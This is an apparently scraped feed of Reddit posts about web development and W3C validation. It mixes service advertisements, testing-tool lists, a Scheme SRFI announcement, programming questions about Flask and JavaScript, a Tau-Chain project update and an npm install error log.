W3C validering

W3C Uyumluluk Testi - (W3C Validation) » Web Vimi

2020.11.22 08:34 WebVimi W3C Uyumluluk Testi - (W3C Validation) » Web Vimi

W3C Uyumluluk Testi - (W3C Validation) » Web Vimi submitted by WebVimi to u/WebVimi [link] [comments]

2020.11.13 16:52 QArea_ltd 26 Basic Tools for Testing Your Website

Have you ever wanted to buy goods or services on a website that takes a few seconds to load or you need to figure out which button to tap on? If things are complicated and website performance is poor, people will find another place to complete their needs. If you only plan to launch your site or you want to improve the current one, use basic tools for testing to find out what’s going wrong and what you should improve right away.

Tools for performance testing

You can be fine with online website testing services – they will show you the speed of the page load, how people see your site from different locations, and so on. The more different manual website testing tools you use, the more you will be able to improve.

Here are the top eleven tools for performance testing:

  1. Google Page Speed Insights – a site performance from Google, both for mobile and desktop devices.
  2. Webpagetest – it checks to detect the causes of the slow loading of the site.
  3. GTMetrix – it allows you to check the performance of the site.
  4. Pingdom – it’s a monitoring service and a free automated website testing tool.
  5. Gomez – viewing from multiple locations. Over 100 locations to choose from.
  6. Alertra – viewing from several locations.
  7. Load Impact – testing from several locations and performance reports.
  8. FeedTheBot – tests for website optimization and performance.
  9. Dotcom Monitor – site performance tests from 20 locations with just one click.
  10. RedBot is a small utility for checking HTTP headers.
  11. Neustar Ultratools – a set of utilities for checking the speed of hosting, DNS, and more.

Mobile-friendly testing tools

If you already have a site friendly with mobile devices, or you plan to get one, these basic website QA testing tools will definitely help you. Today I decided to collect for you the best tools for testing sites on mobile operating systems such as iOS and Android, without the need to use physical devices. These tools will help you test the functionality and adaptability of your sites on various mobile platforms.
Below I want to give you a small selection of mobile emulators, as well as other tools for testing and validation on various mobile platforms. These tools will help you identify the problem areas of your website and take appropriate action.

Mobile emulators

  1. Mobile emulator – for viewing site pages on mobile screens.
  2. Responsive Design Test – for site checking on mobile devices.
  3. Responsive test – a tool for checking the display of the site with various screen extensions.
  4. Emulator – to see the way your site is displayed on the iPhone.
  5. Responsivepx – for testing site responsiveness.
  6. Responsive Test – cross-site browser testing tool.
18 Viewing a site on an iPad – mobile iPad emulator.

Additional browser emulators

  1. Opera Mini Emulator – to view pages in this browser.
  2. Responsive Design Tool – for seeing the site design.
  3. Resize My Browser – different browser extensions.

Browser plugins

  1. Modify Headers (Firefox) – for viewing mobile pages.
  2. Responsive Web Design Tester (Chrome) – for checking mobile pages.
  3. Responsive View (Chrome) – for seeing mobile sites.

Tools for validation validation

  1. W3C mobileOK Checker – for mobile site validity.
  2. MobiReady – for validation purposes.


Testing takes time and effort. However, it will make you feel sure that everything works fine and site visitors will be fully satisfied with their experience. The variety of tools is huge, so it may be hard to check every trifle on the site.
Another way of validating high performance and compatibility with mobile devices is hiring a website testing company instead of spending so much time on completing this task yourself. In this case, you will have a person or a team that has professional tools for testing every feature of the site – it’s a good choice if you need high-quality testing processes and predictable results.
submitted by QArea_ltd to Development [link] [comments]

2020.11.09 09:09 itboulevard Web Development Company in Mohali

Web Development Company in Mohali
Being a reliable web development company in Mohali, we can provide you competent front-end development solutions. Our team of experienced and skilled developers uses innovative graphic designs to clean W3C validated mark-up for the best development solutions for our clients.
submitted by itboulevard to u/itboulevard [link] [comments]

2020.10.29 20:56 arthurgleckler Final SRFI 207: String-notated bytevectors

Scheme Request for Implementation 207, "String-notated bytevectors," Daphne Preston-Kendal (external notation), John Cowan (procedure design), and Wolfgang Corcoran-Mathe (implementation), has gone into final status.
The document and an archive of the discussion are available at https://srfi.schemers.org/srfi-207/.
Here's the abstract:
To ease the human reading and writing of Scheme code involving binary data that for mnemonic reasons corresponds as a whole or in part to ASCII-coded text, a notation for bytevectors is defined which allows printable ASCII characters to be used literally without being converted to their corresponding integer forms. In addition, this SRFI provides a set of procedures known as the bytestring library for constructing a bytevector from a sequence of integers, characters, strings, and/or bytevectors, and for manipulating bytevectors as if they were strings as far as possible.
Here is the commit summary since the most recent draft:
Here are the diffs since the most recent draft:
Many thanks to Daphne, John, and Wolfgang, and to everyone who contributed to the discussion of this SRFI.
SRFI Editor
submitted by arthurgleckler to scheme [link] [comments]

2020.10.28 02:00 loraxx753 Raise your hand if you've done

so you could figure out what closed what. 🙋‍♂️

Have you ever run into this issue:
Adding is kind of a hacky fix, isn't it?
Wouldn't it be nice for that html to look like this instead:
Then do it. As long as you have a dash in the element's name, you can name it whatever you want. Use it anywhere you can use a regular
Like the CSS
the-page { background: blue; } the-page > the-wrapper { color: red; } 
or Javascript
const link_wrapper = document.querySelector('link-wrapper'); link_wrapper.addEventListener('click', function() {}); 
submitted by loraxx753 to learnjavascript [link] [comments]

2020.10.20 08:22 milkywayservice Website Development Company Noida To Make Virtual Dream Come True

Website Development Company Noida To Make Virtual Dream Come True
There are many leading web development companies that specialize in effective virtual branding according to W3C standards. They have been providing the best web development services and serving their clients. They also offer the most satisfactory results for your digital needs and help your business grow. The best Website Development Company Noida, has a dedicated team of professional designers and developers who create powerful and beautiful websites. They use an extremely clean and bold design style to provide standards-based markup code for your websites that score well on Google and helps increase conversions. Web Development Companies in India, believe that a good online presence starts with a great website and experiences.

Basic Services provided by Website Development Company Noida

Web development experts use the latest technologies and platforms like WordPress, Joomla, Drupal, and more to achieve your business goals. Some common Web development services provided by Website Development Company Noida are given below:
1) Dedicated web application
A generic, out-of-the-box web solution may not meet specific business needs. In this case, custom web development is essential to obtain the best results. They help you create a custom web application for your specific business needs. Their design contextual UI/UX for better usability, choose the appropriate architecture for best performance and write custom code to incorporate your complex and unique business logic into your web application.
2) E-commerce development
Ecommerce development offers you much more than a trading platform. They focus on developing solutions that increase customer loyalty and loyalty to your retail business. From visual experiments to personalized suggestions, chat marketing push notifications, and an admin dashboard, it has all the latest features your eCommerce retail business needs.

Web Design Process Followed By Website Development Company Noida

1) Understand the customer's vision:
First of all, They listen carefully and fully to customer needs, make sure your questions are answered in the best way, and guide you in the right direction.
2) Planning And Understanding Requirements:
Create a plan to keep your website development process manageable and organized. They understand the importance of reaching goals and providing a great experience for end-users.
3) Design And Development:
Once a platform is designed, they send the design to the client for review and comment. They look for innovative details until you are satisfied with their work. The approved design is then coded and developed.
4) Testing Phase:
They run the website on multiple devices and use advanced tools to ensure that it is responsive, easy to use, and error-free according to W3C validation. When problems occur, they make the necessary changes to carry out quality projects.
5) Implementation Phase:
After making sure that your website is error-free, they offer it to the market by hosting it on your server that is open to you, your employees, and users. The Website Development Company Noida also provides maintenance and support if you encounter performance issues.
submitted by milkywayservice to u/milkywayservice [link] [comments]

2020.10.19 08:31 TroyBarone Faded - Responsive App Landing Page WordPress Theme + RTL

Faded - Responsive App Landing Page WordPress Theme + RTL
FADED is a modern App Landing Page WordPress Theme – beautifully crafted for using in any related product in the industry like mobile apps, saas applications, software, digital products, even books or magazines.

  1. Clean, Modern & Beautiful Design
  2. Fully Responsive Bootstrap Based (3.x)
  3. WPML – Muti-lingual support integrated
  4. RTL – ‘Right To Left’ supported
  5. Yoast SEO integrated
  6. Working Contact Form
  7. MailChimp Integrated
  8. Blog, Blog Single Post Included
  9. Google Fonts Used
  10. Font Awesome (630+), Ionicons (730+) & Linearicons (1000+) icons
  11. Very Smooth Transition Effects
  12. Super Easy To Customize
  13. Well Commented Code
  14. W3C Valid Code
  15. Very Good Documentation
  16. Top Notch Support
submitted by TroyBarone to WordPressThemes [link] [comments]

2020.10.11 17:44 reliableseoservices RELIABLE SEO SERVICES



Technical SEO & Digital Marketer. Data Driven & ROI Focused Marketing.

I provide Search Engine Optimization (SEO) / Social Media Optimization (SMO) / Pay Per Click (PPC) / Email Marketing Digital Marketing Freelance Services with 9+ Years Experience WhatsApp 91-8955519549 Skype ID: reliableseoservicess

Experienced (9+ years) Search Engine Optimization Executive with a demonstrated history of working in the information technology and services industry. Skilled in Search Engine Optimization (SEO), Keyword Research, Social Media Optimization (SMO), etc. We understand how Google views websites and what makes some sites rank better than others for certain search words. Our work involves improving the 'trust' value of a website so that it starts to climb up the rankings until the website appears on page one or even in the top position on Google. The techniques we use fully comply with Google's terms and conditions.

• Established & Proven SEO Strategies.
• 100% Ethical, White Hat Practices.
• Fully Managed SEO Services.
• Quality of Work.
• Systematically social media optimization.
• Strong &Talented skills.
• strong and dynamic Social media pages promotion.

Our SEO Skills are listed below:-

• On-page Optimization:
(Technical implementations)

• Structural & Analytical Analysis
• Search Worthy Keyword Research
• Appropriate Tagging - Titles, Meta Descriptions, Meta Keywords, Heading Tags, Alt Tags etc.
• URL Optimization
• Anchor Text Linking in Content
• Sitemaps & Feed - HTML, XML, RSS
• Robots File Setup
• Google Search Console Setup
• Google Analytics Setup
• Canonical Tags
• 301 Redirects
• Duplicate Content Fixing
• W3C Validation
• Broken Links, HTML Validation Errors etc. Fixing
• W3C Validation
• Schema Implementation

• Off-page Optimization:
(Back links creation through top online resources for divert the traffic on website.)

• Business Directory Submission / Profile Linking
• Social Bookmarking
• Article Submission
• Classified Ads Submission
• Blog Posting
• Blog Commenting
• Business Profile Listing / Citation
• Web 2.0 Blog Submission
• Search Engine Places Listing
• Document Sharing in form of PDFs, Videos, Slide Show etc.
• Search Engine Submission
• Image Sharing
• Q & A Sites submission like Quora, Yahoo Answers etc.
submitted by reliableseoservices to u/reliableseoservices [link] [comments]

2020.10.03 06:17 wic2011 RSS feed issue with IFTTT

Hi guys, I am trying to create an applet to link the RSS feed for my website to Facebook and IFTTT is saying the RSS feed is invalid even though the RSS feed is valid and I have checked with W3C Feed validation to confirm this. Anything I can do?
submitted by wic2011 to ifttt [link] [comments]

2020.09.29 10:27 parvanweb طراحی سایت دانلود قالب سایت دانلود وردپرس

در ادامه سری نمونه کار های گروه طراحی پروان وب ، نمونه کار طراحی سایت دانلود گروه نرم افزاری مورچه که به صورت کاملا اختصاصی و از پایه توسط گروه طراحی پروان وب انجام شد و یکی از بهترین قالب های طراحی شده در زمینه سایت دانلود بی شک می باشد. طراحی گرافیک وب سایت در مرحله اول و دریافت تایید از مشتری محترم و سپس پیاده سازی طرح گرافیک وب سایت به HTML5/CSS3 بصورت کاملا ولید و ریسپانسیو و طراحی شده با بهترین فریم ورک جهان یعنی Bootstrap نسخه ۴ و سپس پیاده سازی وردپرس همراه با تنظیمات کامل مدیریت قالب برای مدیریت راحت وب سایت دانلود وردپرس گروه نرم افزاری مورچه

امکانات قالب و سایت دانلود طراحی شده :

تکنولوژی های مورد استفاده در طراحی وب سایت گروه نرم افزار مورچه :

مشاهده طراحی سایت دانلود مورچه
submitted by parvanweb to u/parvanweb [link] [comments]

2020.09.22 12:05 itcrowd21 How to use yield instead if return?

I'm writing a WhatsApp chat bot using Flask adapting the tutorial here and the following code snippet works when I'm testing locally and using print (the 'bot' successfully returns some results from Airtable in response to a WhatsApp message):
def pretty(d): return f'''Date: {d['Date']!r} Title: {d['Title']!r} Description: {d['Description']!r} ''' pages = airtable.get_iter(maxRecords=3, formula="Date >= NOW()", sort=["Date"], fields=('Date', 'Title', 'Description')) for page in pages: for record in page: if 'fields' not in record: continue fields = record['fields'] print(pretty(fields)) 
The above is good and works when I run it locally. I got some help from this subreddit for the def pretty(d) function - major props to my helper.
However, I run into problems when I deploy to Heroku - the return here causes the loop to break and I only get one result (I want 3 results or n results as requested):
 if 'next' in incoming_msg: def pretty(d): return f'''Date: {d['Date']!r} Title: {d['Title']!r} Description: {d['Description']!r} ''' pages = airtable.get_iter(maxRecords=3, formula="Date >= NOW()", sort=["Date"], fields=('Date', 'Title', 'Description')) for page in pages: for record in page: if 'fields' not in record: continue fields = record['fields'] return(pretty(fields)) 
So I try using yield instead of return:
 if 'next' in incoming_msg: def pretty(d): return f'''Date: {d['Date']!r} Title: {d['Title']!r} Description: {d['Description']!r} ''' pages = airtable.get_iter(maxRecords=3, formula="Date >= NOW()", sort=["Date"], fields=('Date', 'Title', 'Description')) for page in pages: for record in page: if 'fields' not in record: continue fields = record['fields'] yield(pretty(fields)) 
But I get this error:
TypeError: The view function did not return a valid response. The return type must be a string, dict, tuple, Response instance, or WSGI callable, but it was a generator. 
Perhaps I have the syntax wrong but the following just crashes and burns:
 for page in pages: for record in page: if 'fields' not in record: continue fields = record['fields'] yield (pretty(fields)) 
When I call the above code with a webhook, it fails in a major way:
 500 Internal Server Error 

Internal Server Error

The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
So, how do I return the results of a nested loop using yield instead of return in this case?
Many thanks in advance.
submitted by itcrowd21 to learnpython [link] [comments]

2020.09.18 06:13 arthurgleckler Final SRFI 196: Range Objects

Scheme Request for Implementation 196,"Range Objects,"by John Cowan (text), Wolfgang Corcoran-Mathe (implementation)
,has gone into final status.
The document and an archive of the discussion are available at https://srfi.schemers.org/srfi-196/.
Here's the abstract:
Ranges are collections somewhat similar to vectors, except that they are immutable and have algorithmic representations instead of the uniform per-element data structure of vectors. The storage required is usually less than the size of the same collection stored in a vector and the time needed to reference a particular element is typically less for a range than for the same collection stored in a list. This SRFI defines a large subset of the sequence operations defined on lists, vectors, strings, and other collections. If necessary, a range can be converted to a list, vector, or string of its elements or a generator that will lazily produce each element in the range.
Here is the commit summary since the most recent draft:
Here are the diffs since the most recent draft:
Many thanks to John and Wolfgang and to everyone who contributed to the discussion of this SRFI.
SRFI Editor
submitted by arthurgleckler to scheme [link] [comments]

2020.09.03 21:28 monopolyinvestments Livio Review, Bonus, Demo Video From Art Flair



Livio Review, Bonus, Demo Video From Art Flair


Art Flair’s Livio, Mega Bonuses link
Livio – Automatically, With Just 1-Click Identifies All The Mistakes & Problems Of Any Website Which Prevent It To Rank On #1 In Google Search Engine
Livio Helps Anyone Generate Traffic, Leads & Sales
This is one of the most powerful system which automatically, with just 1 Click identifies all the mistakes of your website and problems which prevents it to rank on #1 in Google Search Engine!
Not only the mistakes, but it also gives you an Easy-to-Understand PDF Report which you can save for future and offline use. You can easily compare yours and competitors’ sites and easily find out where you are lacking – The Exact Points which your opponent is strong on!!
Along with it, It also comes with 100% Whitelabel PDF Reporting System where you can just plug in your Logo, Company etc and send to your clients. These are the Metrics that will be measured: 1. Meta Title 2. Meta Description 3. Meta Keywords 4. Headings 5. Google Preview 6. Missing Image Alt Attribute 7. Keywords Cloud 8. Keyword Consistency 9. Text/HTML Ratio 10. GZIP Compression Test 11. WWW / NON-WWW Resolve 12. IP Canonicalization 13. XML Sitemap 14. Robots.txt 15. URL Rewrite 16. Underscores in the URLs 17. Embedded Objects 18. Iframe Check 19. Domain Registration 20. WHOIS Data 21. Indexed Pages Count (Google) 22. Backlinks Counter 23. URL Count 24. Favicon Test 25. Custom 404 Page Test 26. Page Size 27. Website Load Time 28. PageSpeed Insights (Desktop) 29. Language Check 30. Domain Availability 31. Typo Availability 32. Email Privacy 33. Safe Browsing 34. Mobile Friendliness 35. Mobile Preview Screenshot 36. Mobile Compatibility 37. PageSpeed Insights (Mobile) 38. Server IP 39. Server Location 40. Hosting Service Provider 41. Speed Tips 42. Analytics 43. W3C Validity 44. Doc Type 45. Encoding 46. Facebook Likes Count 47. PlusOne Count 48. StumbleUpon Count 49. LinkedIn Count 50. Estimated Worth 51. Alexa Global Rank 52. Visitors Localization 53. In-Page Links 54. Broken Links

Livio Upgrade Offers (OTOs)

Upgrade #1: Livio Done For You 100% Done For You Pack to get you started in next 05 min. This includes our TESTED & PROVEN work. ​DFY Evergreen Affiliate Campaigns ​DFY AUTOMATED Campaigns ​DFY CPA Campaigns ​DFY Social Media Promos ​DFY Email Campaigns ​DFY Engagement Posts ​DFY Squeeze Pages ​DFY Stock Music ​DFY Images
Upgrade #2: Livio Case Studies Livio Case Studies: Copy-Paste from our 08 of our Real Life Case Studies (each one made us Thousands of Dollars). It’s 100% Done For You – all you have to do is Copy-Paste these into your accounts and you can start seeing results almost instantly! ​We will show you exactly how to scale your online income up, from $100 a day to $200, $300 or even $500 per day with our unique Advanced Training & Strategies!
Upgrade #3: 6x Reseller Sell Livio & 05 High Converting Funnels as your own product and keep 100% Profits for yourself. ​Make Up To $498 Per Sale ​Resellers License To Traffic Turbine ​Resellers License To 5 Additional Funnels ​All Promo Material
Upgrade #4: Livio 6-Fig Training Livio Super Affiliate/Vendor Training: Want To Become A Super Affiliate? Leverage these traffic & product training to build yourself a 6-fig business this year. It includes: ​Instagram Traffic Module ​Google Adwords Module ​Product Creation Module
Upgrade #5: 03 Traffic Softwares Livio 03 Traffic Softwares – Snatch 3 Additional Traffic Software For The Price of one! Rapid Lead Magnets ​Keyword Research Ninja ​Twitter Marketing Bot
Upgrade #6: 45 WSOTD Livio 45 WSOTD Products – Get your hands on every single product TEAM BLACK BELT released since 2015 that got a Warrior+ DOTD Award or the JVZoo POTD Award! This includes multiple traffic formulas, sales making strategies and even software!
Art Flair’s Livio, Mega Bonuses link
submitted by monopolyinvestments to u/monopolyinvestments [link] [comments]

2020.09.02 13:38 m4nki Summary of Tau-Chain Monthly Video Update - August 2020

Transcript of the Tau-Chain & Agoras Monthly Video Update – August 2020
Major event of this past month: Release of the Whitepaper. Encourages everyone to read the Whitepaper because it’s going to guide our development efforts for the foreseeable future. Development is proceeding well on two major fronts: 1. Agoras Live website: Features are being added to it, only two major features are missing 2. TML: We identified ten major tasks to be completed before the next release. Three of them are optimization features which are very important for the speed and performance features of TML. In terms of time requirements, we feel very good to stay on schedule for the end of this year. We also are bringing in two extra resources to help us get there as soon as possible.
Been working on changes in the string relation, especially moving from binary string representation to unistring. The idea is that now rather than having two arguments in the term, you would have a single argument for the string. Thus, the hierarchy changes from two to one and that has an effect on speed and on the storage. So the first few numbers that we calculated showed that we are around 10% faster than with the binary string. There are some other changes that need to be made with regards to the string which he is working on.
Had to revise how we encode characters in order to be compatible with the internet. It also was the last missing piece in order to compute persistence. The reason is that the stored data has to be portable and if TML needs characters and strings internally in the same encoding as it stores its own data, we can map strings directly into files and gain lots of speed with it. The code is now pushed in the repository and can be tested. He’s also working on a TML tutorial and likely before next update, there should be something available online.
Transcribed past month’s video update. You can find it on Reddit. Also, he has done more outreach towards potential partner universities and research groups and this month the response rate was better than earlier, most likely because of the whitepaper release. Positive replies include: University of Mannheim, Trier (Computational Linguistics & Digital Humanities), research group AI KR from within the W3C (https://www.w3.org/community/aik) articulated strong interest in getting a discussion going, particularly because they had some misconceptions about blockchain. They would like to have a Q&A session with a couple of their group members but first it’s important for us to have them read the whitepaper to get a basic understanding and then be able to ask respective questions. Other interested parties include the Computational Linguistics research group of the University of Groningen, Netherlands and also the Center for Language Technology of the University of Gothenburg, Sweden. We also got connected to the Chalmers University of Technology, Sweden. Also has done some press outreach in combination with the whitepaper, trying to get respective media outlets to cover our project, but so far hasn’t gotten feedback back. Been discussing the social media strategy with Ohad and Fola, trying to be more active on our channels and have a weekly posting schedule on Twitter including non-technical and technical contests that engage with all parts of our community. Furthermore, has opened up a discussion on Discord (https://discord.gg/qZtJs78) in the “Tau-Discussion” channel around the topics that Ohad mentioned he would first like to see discussed on Tau (see https://youtu.be/O4SFxq_3ask?t=2225):
  1. Definitions of what good and bad means and what better and worse means.
  2. The governance model over Tau.
  3. The specification of Tau itself and how to make it grow and evolve even more to suit wider audiences. The whole point of Tau is people collaborating in order to define Tau itself and to improve it over time, so it will improve up to infinity. This is the main thing, especially initially, that the Tau developers (or rather users) advance the platform more and more.
If you are interested in participating in the discussion, join our Discord (https://discord.gg/qZtJs78) and post your thoughts – we’d appreciate it! Also has finished designing the bounty claiming process, so people that worked on a bounty now can claim their reward by filling out the bounty claiming form (https://forms.gle/HvksdaavuJbu4PCV8). Been also working on revamping the original post in the Bitcointalk-Thread. It contains a lot of broken links and generally is outdated, so he’s using the whitepaper to give it a complete overhaul. With the whitepaper release, the community also got a lot more active which was great to see and thus, he dedicated more time towards supporting the community.
Finished multiple milestones with regards to the Agoras Live website: 1. Question part where people post their requests and knowledge providers can help them with missing knowledge. 2. Have been through multiple iterations of how to approach the services in the website. How the service seeker can discover new people through the website. 3. Connected the limited, static categories on the website to add more diversity to it. By adding tags, it will be easier for service seekers to find what they are looking for. 4. Onboarding: Been working on adding an onboarding step for the user, so the user chooses categories of his interest and as a result, he will find the homepage to be more personalized towards him and his interests. 5. New section to the user profile added: The service that the knowledge provider can provide. Can be added as tags or free text. 6. Search: Can filter via free text and filter by country, language, etc. 7. Been working on how to display the knowledge providers on the platform.
Improved look of the Agoras Live front page: Looks more clean. Finetuned search options. Redesigned the header. It now has notification icons. If you query a knowledge provider for an appointment, he will receive a notification about the new appointment to be approved or rejected. You can also add a user to your favorites. Front page now randomly displays users. Also implemented email templates, e.g. a thank you email upon registration or an appointment reminder. What is left to do is the session list and then the basic engine will be ready. Also needs to implement the “questions” section.
Has switched towards development of TML related features. Been working mainly on the first order logic support. Has integrated the formula parser with the TML core functionality. With this being connected, we added to TML quantified Boolean function solving capability in the same way as we get the first order logic support. It’s worth mentioning that this feature is being supported by means of the main optimized BDD primitives that we already have in the TML engine. Looking forward to make this scalable in terms of formula sizes. It’s a matter of refining the Boolean solution and doing proper tests to show this milestone to the community in a proper way.
Have been discussing the feasibility of a token swap towards ERC20 from the Omni token with exchanges and internally with the team. Also has been discussing the social media strategy with Kilian. As we update with the new visual identity and the branding, it’s a good time to boost our social media channels and look ready for the next iteration of our look and feel. Continuing on the aspects of our visual identity and design, he’s been talking to quite a number of large agencies who have been involved in some of the larger projects in the software space. One being Phantom (https://phantom.land) who designed the DeepMind website (https://deepmind.com), the other one being Outcast (https://theoutcastagency.com) who have been working with Intel and SalesForce. We aren’t sure yet with which company we go but it’s been good to get insight into how they work and which steps they’d take into getting our project out to the wider audience. That whole process has been a lot of research into what kind of agencies we’d want to get involved with. Also, with the release of the whitepaper being such a big milestone in the history of the company, he’s been doing a lot of reading of that paper. We’re also looking to get more manpower involved with the TML website. Also going to hire a frontend developer for the website and the backend will be done according to Ohad’s requirements. Also, as a response of the community’s feedback towards the Omni deck not being user friendly, he did some outreach to the Omni team and introduced them to a partner exchange for Agoras Live. They have an “exchange-in-a-box” service which may help Omni to have a much more usable interface for the Omni Dex, so hopefully they will be working together to improve the usability of the Omni Dex.
Finished writing the community draft of the whitepaper. The final version will contain changes according to the community’s feedback and more elaboration on more topics that weren’t inserted in the current paper, including logics for law and about the full process of Tau. And, as usual, he’s been doing more research of second order logic, specifically, Boolean options and also analyzing the situation where the formulas in conjunctive normal form trying to extract some information from such a cnf. Also, what Juan mentioned about first order logic: People who are already familiar with TML will see that now with this change, the easiness of using TML got much more advanced. In first order formulas, expressing yourself has become much easier than before.
Q: What is the difference between Horn Second Order Logic and Krom Second Order Logic?
A: Horn and Krom are special cases of cnf (conjunctive normal form). Conjunctive normal form means the formula has the form of n conjunction between clauses. This clause and this clause while each clause is a disjunction of atoms: It’s this or this or this or that. And now any formula can be written in conjunctive form. Any formula can be brought to this form. Krom is the case where each clause contains exactly two atoms and Horn is the case where at most one atom in every clause is positive – thre rest are negated, that’s the definition.
Q: Now that the whitepaper has been released, how do you think it will affect the work of the developers?
A: We see the whitepaper as being a roadmap of development for us, so it will essentially be the vision that we are working to implement. Of course, we have to turn it into much more specific tasks, but as you saw from the detailed progress from last month, that’s exactly what we do.
Q: When can we expect the new website?
A: We’ve just updated the website with the whitepaper and the new website should be launching after we get the branding done. There’s a lot of work to be done and a lot of considerations taking place. We have to get the graphics ready and the front end done. The branding is the most important step we have to get done and once that is complete, we will launch the new website.
Q: What needs to be resolved next before we get onto a solid US exchange?
A: With the whitepaper released, that’s probably been the biggest hurdle we had to get over. At this point, we still have to confirm some elements of the plan with the US regulators and we do need to have some sort of product available. Be that the TML release or Agoras Live, there needs to be something out for people to use. So, in conjunction with the whitepaper and approval from the US regulators, we need to have a product available to get onto US exchanges.
Q: Does the team still need to get bigger to reach cruising speed, if so, how much by and in which areas?
A: Of course, any development team would like to have as many resources as possible but working with the resources we that have right now, we are making significant progress towards the two development goals that we have, both the Agoras Live website and the TML engine. But we are bringing in at least two more resources in the near future but there’s no lack of work to be done and also there’s no lack of progress.
Q: Will Prof. Carmi continue to work in the team and if so, in what capacity?
A: Sure, Prof. Carmi will continue coordinating with us. Right now, he’s working on the mathematics of certain features in the derivatives market that Agoras is planned to have, and also ongoing research in relevant logic.
Q: Will you translate the whitepaper into other languages?
A: Yes, we expect translations of the whitepaper to occur. The most important languages that comprise our community, e.g. Chinese. What languages exactly, we cannot tell right now, but mainly the most prominent languages that comprise our community.
Q: Is the roadmap on the website still correct and, when will we move to the next step?
A: We will be revamping the website soon including the roadmap that will be a summary of what’s been published in the whitepaper but the old version of the roadmap on the website is no longer up-to-date.
Q: What are the requirements for Agoras to have its own chain?
A: If the question means why Agoras doesn’t have its own chain right now, well there is no special reason. We need to reach there and we will reach there.
Q: When Agoras switches to its own chain, will you need to create a new payments system from scratch?
A: No, we won’t have to. We will have to integrate with the new payment channel but that’s something we are planning to do anyway. We will be integrating with several exchanges and several payment channels so it won’t be a huge task. Most of the heavy lifting is in the wallet and key management which will be done on the client side but we’re already planning on having more than one payment gateway anyway so having one more is no problem.
Q: When can we see Tau work with a real practical example?
A: For examples of applications of TML, we are currently working on a TML tutorial and a set of demos. Two of our developers are currently working on it and it’s going to be a big part of our next release.
Q: How can we make speaking in formal languages easier, with an example?
A: Coming up with a usable and convenient formal language is a big task which maybe it’s even safe to say no one achieved up until today. But we solve this problem indirectly yet completely by not coming up with any language but letting languages to be created and evolve over time through the internet of languages. We don’t have any solution of how to make formal languages very easy for everyone. It will be a collaborative effort over Tau together to reach there over time. You can see in the whitepaper in the section 4.2 about “The Critical Mass and the Tau Chain Reaction”.
Q: What are the biggest limitations of Tau and, are they solvable?
A: TML cannot do everything that requires more than polynomial space to be done and there are infinitely many things like this. For example, you can look up x time or x space complete problems. We would want to say elementary but there is no elementary complete problem but there are complete problems in each of the levels of elementary. All those, TML cannot do because this is above polynomial space. Another drawback of TML which comes from the usage of BDDs is arithmetic. In particular, multiplication. Multiplication is highly inefficient in TML because of the nature of BDDs and of course BDDs bring so many more good things that even this drawback of slow multiplication is small compared to all the possibilities that this gives us. Another limitation, which we will emphasize in the next version of the whitepaper, is the satisfiability problem. The satisfiability problem of a formula without a model to ask whether a model exists – not a model checking like right now but to ask whether a model exists – this is undecidable already on very restricted classes as follows from Trakhtenbrot’s theory. So in particular, the containment problem, the scalability problem, the validity problem, they all are undecidable in TML as is and for them to be decidable, we need to restrict even more the expressive power and look at narrower fragments of the language. But again, this will be more emphasized in the next version of the whitepaper.
Q: It looks years for projects such as Maidsafe to build something mediocre, why should Agoras be able to do similar or better in less time?
A: Early on in the life of the Tau project, we’ve identified the computational resources marketplace as one of the possible applications of Tau, so it is very much on our roadmap. However, as you mentioned, there are some other projects, e.g. Filecoin, which is specifically focusing on the problem of storage. So even though it’s on our roadmap, we’re not there yet but we are watching closely what our competitors in this field are doing. While they haven’t yet delivered on their promise of an open and distributed storage network, we feel that at some point we will have more value to bring to the project. So distributed storage is on our roadmap but it’s not a priority for us right now but eventually we’ll get there.
Q: What are the requirements in scalability, e.g. permanent storage etc.?
A: We haven’t answered that question yet.
Q: Will Tau be able to run on a mobile phone?
A: Definitely, Yes. We’re planning on being available on all computational platforms, be it a server, laptop, phone or an iPad type of device.
Q: Given a vast trove of knowledge, how can Tau determine relevance? Can it also build defenses against spam attacks and garbage data?
A: Tau doesn’t offer any predetermined solution to this. It is basically all up to the user. The user will have to define what’s criminal and what’s not. Of course, most users will not bother with defining this but they will be able to automatically agree to people who already defined it and by that import their definitions. So bottom line: It’s really up to the users.
Q: What are your top priorities for the next three months?
A: Our goal for this year (2020) is to release a first version of Agoras Live and of TML.
Q: Ohad mentioned the following at the start of the year: Time for us to work on Agoras. We need to create the Agoras team and commence work. We made a major improvement in one of Agoras’ aspects in the form of theatrical breakthrough but we’re not ready yet to share the details publicly. Is there any further news or progress with the development of Agoras?
A: If the question is whether there has been more progress in the development of Agoras, specifically with regards to new discoveries for the derivatives market, then the answer is of course yes. Professor Carmi is now working on those inventions related to the derivatives market. We still keep them secret and of course, with Agoras Live, knowledge sharing for money is coming.
submitted by m4nki to tauchain [link] [comments]

2020.08.22 16:07 JonathanWillard I can't install Percollate on Linux Mint 20 Ulyana. I know I could use wkhtmltopdf but I know from experience that Percollate is superior.

LONG POST WARNING - lots of code copied in the interest of clarity.

I tried running "npm i percollate" and after installing it gave:
npm WARN enoent ENOENT: no such file or directory, open '/home/name/package.json'
npm WARN name No description
npm WARN name No repository field.
npm WARN name No README data
npm WARN name No license field.
[email protected]:~$ npm i percollate
npm WARN deprecated [email protected]: request has been deprecated, see https://github.com/request/request/issues/3142
npm WARN deprecated [email protected]: request-promise-native has been deprecated because it extends the now deprecated request package, see https://github.com/request/request/issues/3142
npm WARN deprecated [email protected]: this library is no longer supported
- u/sindresorhus/is@0.14.0 node_modules/@sindresorhus/is
- [email protected] node_modules/ansi-regex
[email protected] node_modules/concat-stream/node_modules/safe-buffer -> node_modules/archiver-utils/node_modules/safe-buffer
string_[email protected] node_modules/concat-stream/node_modules/string_decoder -> node_modules/archiver-utils/node_modules/string_decoder
[email protected] node_modules/concat-stream/node_modules/readable-stream -> node_modules/archiver-utils/node_modules/readable-stream
- [email protected] node_modules/array-equal
- [email protected] node_modules/async-limiter
- [email protected] node_modules/buffer-from
- [email protected] node_modules/cacheable-request/node_modules/get-stream
- [email protected] node_modules/cacheable-request/node_modules/lowercase-keys
- [email protected] node_modules/cli-spinners
- [email protected] node_modules/clone
- [email protected] node_modules/color-name
- [email protected] node_modules/color-convert
- [email protected] node_modules/ansi-styles
- [email protected] node_modules/defaults
- [email protected] node_modules/defer-to-connect
- u/szmarczak/http-timer@1.1.2 node_modules/@szmarczak/http-timer
- [email protected] node_modules/duplexer3
- [email protected] node_modules/es6-promise
- [email protected] node_modules/es6-promisify
- [email protected] node_modules/escape-string-regexp
- [email protected] node_modules/fsevents
- [email protected] node_modules/get-stream
